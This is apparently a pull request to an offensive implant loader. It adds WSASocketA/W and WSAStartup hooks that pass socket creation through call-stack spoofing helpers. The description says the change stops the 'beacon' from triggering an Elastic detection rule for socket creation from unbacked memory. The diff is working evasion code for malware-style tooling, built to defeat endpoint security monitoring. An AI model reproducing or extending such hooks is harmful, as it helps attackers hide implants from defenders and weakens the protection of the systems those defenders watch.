### PR TITLE
add hooks for WSASocket

### DIFF
--- a/loader/pico.spec
+++ b/loader/pico.spec
@@ -64,6 +64,9 @@ x64:
     addhook "KERNEL32$VirtualQuery"       "_VirtualQuery"
     addhook "KERNEL32$WriteProcessMemory" "_WriteProcessMemory"
     addhook "OLE32$CoCreateInstance"      "_CoCreateInstance"
+    addhook "WS2_32$WSASocketA"             "_WSASocketA"
+    addhook "WS2_32$WSASocketW"             "_WSASocketW"
+    addhook "WS2_32$WSAStartup"             "_WSAStartup"
 
     # hook functions in pico
     attach "KERNEL32$VirtualProtect" "_VirtualProtect"  # this is needed to hook VirtualProtect in mask.c

--- a/loader/src/hooks.c
+++ b/loader/src/hooks.c
@@ -1,3 +1,4 @@
+#include <winsock2.h>
 #include <windows.h>
 #include <wininet.h>
 #include <combaseapi.h>
@@ -33,6 +34,54 @@ DECLSPEC_IMPORT SIZE_T    WINAPI KERNEL32$VirtualQuery       ( LPCVOID, PMEMORY_
 DECLSPEC_IMPORT BOOL      WINAPI KERNEL32$WriteProcessMemory ( HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T * );
 DECLSPEC_IMPORT HRESULT   WINAPI OLE32$CoCreateInstance      ( REFCLSID, LPUNKNOWN, DWORD, REFIID, LPVOID * );
 DECLSPEC_IMPORT ULONG     NTAPI  NTDLL$NtContinue            ( CONTEXT *, BOOLEAN );
+
+DECLSPEC_IMPORT SOCKET    WINAPI WS2_32$WSASocketA           (int, int, int, LPWSAPROTOCOL_INFOA, GROUP, DWORD );
+DECLSPEC_IMPORT SOCKET    WINAPI WS2_32$WSASocketW           (int, int, int, LPWSAPROTOCOL_INFOW, GROUP, DWORD );
+DECLSPEC_IMPORT int       WINAPI WS2_32$WSAStartup           (WORD, LPWSADATA);
+
+
+int WINAPI _WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData)
+{
+    FUNCTION_CALL call = { 0 };
+    call.ptr = (PVOID)(WS2_32$WSAStartup);
+    call.argc = 2;
+    call.args[0] = spoof_arg(wVersionRequested);
+    call.args[1] = spoof_arg(lpWSAData);
+    
+    return (int)spoof_call(&call);
+}
+
+SOCKET WINAPI _WSASocketW(int af, int type, int protocol, LPWSAPROTOCOL_INFOW lpProtocolInfo, GROUP g, DWORD dwFlags)
+{
+    FUNCTION_CALL call = { 0 };
+    call.ptr = (PVOID)(WS2_32$WSASocketW);
+    call.argc = 6;
+    call.args[0] = spoof_arg(af);
+    call.args[1] = spoof_arg(type);
+    call.args[2] = spoof_arg(protocol);
+    call.args[3] = spoof_arg(lpProtocolInfo);
+    call.args[4] = spoof_arg(g);
+    call.args[5] = spoof_arg(dwFlags);
+    
+    return (SOCKET)spoof_call(&call);
+}
+
+
+SOCKET WINAPI _WSASocketA(int af, int type, int protocol, LPWSAPROTOCOL_INFOA lpProtocolInfo, GROUP g, DWORD dwFlags)
+{
+    FUNCTION_CALL call = { 0 };
+    call.ptr  = (PVOID)WS2_32$WSASocketA;
+    call.argc = 6;
+    call.args[0] = spoof_arg(af);
+    call.args[1] = spoof_arg(type);
+    call.args[2] = spoof_arg(protocol);
+    call.args[3] = spoof_arg(lpProtocolInfo);
+    call.args[4] = spoof_arg(g);
+    call.args[5] = spoof_arg(dwFlags);
+
+    return (SOCKET)spoof_call(&call);
+}
+
 
 BOOL WINAPI _HttpSendRequestA ( HINTERNET hRequest, LPCSTR lpszHeaders, DWORD dwHeadersLength, LPVOID lpOptional, DWORD dwOptionalLength )
 {


### PR DESCRIPTION
Hello, I added couple hooks for WSASocketA/W.
The WSASocket function creates a socket that is bound to a specific transport-service provider.

Without this hook, the following Elastic rule is triggered during beacon runtime [Windows Socket Creation from Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_windows_socket_creation_from_unbacked_memory.toml) when running the beacon as Administrator.

Thanks

--
<img width="704" height="729" alt="image" src="https://github.com/user-attachments/assets/3b3f8467-c46b-4352-a626-43bea98244ef" />
